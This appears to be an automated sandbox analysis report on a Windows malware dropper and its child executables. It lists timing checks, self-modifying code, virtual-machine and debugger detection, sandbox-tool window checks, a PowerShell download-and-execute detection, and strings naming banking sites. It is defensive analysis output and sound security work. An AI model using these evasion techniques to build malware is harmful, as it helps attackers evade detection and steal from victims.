Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 49C0CA3 second address: 49C0CF9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7905119FC9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F7905119FBEh 0x0000000f push eax 0x00000010 jmp 00007F7905119FBBh 0x00000015 xchg eax, ebp 0x00000016 jmp 00007F7905119FC6h 0x0000001b mov ebp, esp 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 push esi 0x00000021 pop edi 0x00000022 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 4A30D78 second address: 4A30D7E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 4A3020C second address: 4A30240 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, edx 0x00000005 jmp 00007F7905119FC3h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov ebp, esp 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F7905119FC5h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 4A30240 second address: 4A30289 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 587B1942h 0x00000008 mov di, 878Eh 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 mov al, 19h 0x00000015 pushfd 0x00000016 jmp 00007F7905006513h 0x0000001b or ax, E4EEh 0x00000020 jmp 00007F7905006519h 0x00000025 popfd 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 4A30008 second address: 4A3000C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 4A3000C second address: 4A30012 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 4A30012 second address: 4A3006A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7905119FC0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F7905119FC0h 0x0000000f push eax 0x00000010 pushad 0x00000011 mov ecx, edi 0x00000013 mov ebx, 35FE4C20h 0x00000018 popad 0x00000019 xchg eax, ebp 0x0000001a jmp 00007F7905119FBFh 0x0000001f mov ebp, esp 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F7905119FC5h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 4A3006A second address: 4A30070 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 4A30070 second address: 4A30074 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 49C0EC6 second address: 49C0F15 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, edi 0x00000005 pushfd 0x00000006 jmp 00007F790500650Dh 0x0000000b sbb ax, 68A6h 0x00000010 jmp 00007F7905006511h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 xchg eax, ebp 0x0000001a jmp 00007F790500650Eh 0x0000001f push eax 0x00000020 jmp 00007F790500650Bh 0x00000025 xchg eax, ebp 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 49C0F15 second address: 49C0F30 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7905119FC7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 49C0F30 second address: 49C0F48 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7905006514h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 49C0F48 second address: 49C0F81 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007F7905119FC7h 0x0000000f pop ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F7905119FC5h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 4A3046E second address: 4A30472 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 4A30472 second address: 4A30478 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 4A30478 second address: 4A3047E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 4A3047E second address: 4A30482 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 4A3061D second address: 4A30623 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 4A30623 second address: 4A30627 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TxTPu961er.exe	RDTSC instruction interceptor: First address: 49E02B3 second address: 49E0307 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F7905006513h 0x00000008 and al, 0000001Eh 0x0000000b jmp 00007F7905006519h 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 mov edx, eax 0x00000015 popad 0x00000016 xor dword ptr [esp], 5131AD35h 0x0000001d jmp 00007F790500650Ah 0x00000022 push 296ECB05h 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\TxTPu961er.exe	Special instruction interceptor: First address: 54E92D instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\TxTPu961er.exe	Special instruction interceptor: First address: 709A22 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\TxTPu961er.exe	Special instruction interceptor: First address: 6E9D44 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\TxTPu961er.exe	Special instruction interceptor: First address: 76D957 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 91E92D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: AD9A22 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: AB9D44 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: B3D957 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Special instruction interceptor: First address: 23193E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Special instruction interceptor: First address: 3D825C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Special instruction interceptor: First address: 3E4A58 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Special instruction interceptor: First address: 46B5AD instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1085425001\d34ebbe5f2.exe	Special instruction interceptor: First address: 1213D02 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1085425001\d34ebbe5f2.exe	Special instruction interceptor: First address: 123CE64 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1085425001\d34ebbe5f2.exe	Special instruction interceptor: First address: 12A2E95 instructions caused by: Self-modifying code

Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Memory allocated: 4E40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Memory allocated: 5050000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Memory allocated: 4FA0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1085425001\d34ebbe5f2.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085425001\d34ebbe5f2.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085425001\d34ebbe5f2.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\Desktop\TxTPu961er.exe

Code function: 0_2_04A30534 rdtsc

0_2_04A30534

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread delayed: delay time: 180000			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 1076	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 1042	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 467	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 1154	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 1135	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 1067	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 1101	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Window / User API: threadDelayed 2020	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Window / User API: threadDelayed 7660	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8052	Thread sleep count: 1076 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8052	Thread sleep time: -2153076s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8048	Thread sleep count: 1042 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8048	Thread sleep time: -2085042s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8032	Thread sleep count: 467 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8032	Thread sleep time: -14010000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8044	Thread sleep count: 1154 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8044	Thread sleep time: -2309154s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8064	Thread sleep count: 1135 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8064	Thread sleep time: -2271135s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8072	Thread sleep count: 1067 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8072	Thread sleep time: -2135067s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8068	Thread sleep count: 1101 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8068	Thread sleep time: -2203101s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8144	Thread sleep time: -180000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe TID: 7328	Thread sleep time: -36893488147419080s >= -30000s	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\TxTPu961er.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread delayed: delay time: 180000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: Amcache.hve.5.dr	Binary or memory string: VMware
Source: tmpBE0C.tmp.7.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: tmpBE0C.tmp.7.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: tmpBE0C.tmp.7.dr	Binary or memory string: global block list test formVMware20,11696428655
Source: Amcache.hve.5.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: skotes.exe, 00000005.00000002.4515481646.000000000146C000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000005.00000002.4515481646.000000000143C000.00000004.00000020.00020000.00000000.sdmp, d34ebbe5f2.exe, 00000009.00000002.2648771418.0000000000B53000.00000004.00000020.00020000.00000000.sdmp, d34ebbe5f2.exe, 00000009.00000002.2648771418.0000000000B82000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: tmpBE0C.tmp.7.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: Amcache.hve.5.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: tmpBE0C.tmp.7.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: skotes.exe, 00000005.00000002.4515481646.000000000146C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWb
Source: Amcache.hve.5.dr	Binary or memory string: vmci.sys
Source: tmpBE0C.tmp.7.dr	Binary or memory string: AMC password management pageVMware20,11696428655
Source: tmpBE0C.tmp.7.dr	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: tmpBE0C.tmp.7.dr	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: tmpBE0C.tmp.7.dr	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: tmpBE0C.tmp.7.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: Amcache.hve.5.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.5.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.5.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.5.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: d34ebbe5f2.exe, 00000009.00000002.2648771418.0000000000B0E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: tmpBE0C.tmp.7.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: Amcache.hve.5.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.5.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.5.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.5.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.5.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.5.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: tmpBE0C.tmp.7.dr	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: tmpBE0C.tmp.7.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: Amcache.hve.5.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: skotes.exe, skotes.exe, 00000005.00000002.4512482880.0000000000A95000.00000040.00000001.01000000.00000008.sdmp, 9179bdeb47.exe, 9179bdeb47.exe, 00000007.00000002.2932229172.00000000003BB000.00000040.00000001.01000000.0000000A.sdmp, d34ebbe5f2.exe, d34ebbe5f2.exe, 00000009.00000002.2649658650.00000000011F9000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: tmpBE0C.tmp.7.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: Amcache.hve.5.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.5.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.5.dr	Binary or memory string: VMware, Inc.
Source: tmpBE0C.tmp.7.dr	Binary or memory string: discord.comVMware20,11696428655f
Source: Amcache.hve.5.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.5.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.5.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: tmpBE0C.tmp.7.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: Amcache.hve.5.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: tmpBE0C.tmp.7.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: tmpBE0C.tmp.7.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: tmpBE0C.tmp.7.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: tmpBE0C.tmp.7.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: Amcache.hve.5.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: tmpBE0C.tmp.7.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: tmpBE0C.tmp.7.dr	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: tmpBE0C.tmp.7.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: Amcache.hve.5.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: 9179bdeb47.exe, 00000007.00000002.2933169773.0000000000F0E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: tmpBE0C.tmp.7.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: tmpBE0C.tmp.7.dr	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: tmpBE0C.tmp.7.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: tmpBE0C.tmp.7.dr	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: Amcache.hve.5.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.5.dr	Binary or memory string: vmci.syshbin`
Source: tmpBE0C.tmp.7.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: Amcache.hve.5.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: tmpBE0C.tmp.7.dr	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: Amcache.hve.5.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: tmpBE0C.tmp.7.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: Amcache.hve.5.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: TxTPu961er.exe, 00000000.00000002.2082936648.00000000006C5000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, 00000002.00000002.2110374370.0000000000A95000.00000040.00000001.01000000.00000008.sdmp, skotes.exe, 00000003.00000002.2108503337.0000000000A95000.00000040.00000001.01000000.00000008.sdmp, skotes.exe, 00000005.00000002.4512482880.0000000000A95000.00000040.00000001.01000000.00000008.sdmp, 9179bdeb47.exe, 00000007.00000002.2932229172.00000000003BB000.00000040.00000001.01000000.0000000A.sdmp, d34ebbe5f2.exe, 00000009.00000002.2649658650.00000000011F9000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: tmpBE0C.tmp.7.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h

Source: C:\Users\user\Desktop\TxTPu961er.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\TxTPu961er.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\TxTPu961er.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085425001\d34ebbe5f2.exe	Thread information set: HideFromDebugger	Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\AppData\Local\Temp\1085425001\d34ebbe5f2.exe	Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\1085425001\d34ebbe5f2.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\1085425001\d34ebbe5f2.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1085425001\d34ebbe5f2.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\1085425001\d34ebbe5f2.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1085425001\d34ebbe5f2.exe	Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\1085425001\d34ebbe5f2.exe	Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\1085425001\d34ebbe5f2.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\AppData\Local\Temp\1085425001\d34ebbe5f2.exe	File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\1085425001\d34ebbe5f2.exe	File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\1085425001\d34ebbe5f2.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\TxTPu961er.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\TxTPu961er.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\TxTPu961er.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085425001\d34ebbe5f2.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085425001\d34ebbe5f2.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1085425001\d34ebbe5f2.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\Desktop\TxTPu961er.exe

Code function: 0_2_04A30534 rdtsc

0_2_04A30534

Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe

Code function: 7_2_0A25C180 LdrInitializeThunk,

7_2_0A25C180

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 5_2_008E652B mov eax, dword ptr fs:[00000030h]		5_2_008E652B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 5_2_008EA302 mov eax, dword ptr fs:[00000030h]		5_2_008EA302

Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: d34ebbe5f2.exe PID: 4404, type: MEMORYSTR

Source: C:\Users\user\Desktop\TxTPu961er.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe "C:\Users\user\AppData\Local\Temp\1085424001\9179bdeb47.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1085425001\d34ebbe5f2.exe "C:\Users\user\AppData\Local\Temp\1085425001\d34ebbe5f2.exe"	Jump to behavior

Source: skotes.exe, skotes.exe, 00000005.00000002.4512482880.0000000000A95000.00000040.00000001.01000000.00000008.sdmp	Binary or memory string: Program Manager
Source: 9179bdeb47.exe, 9179bdeb47.exe, 00000007.00000002.2932229172.00000000003BB000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: ]Program Manager
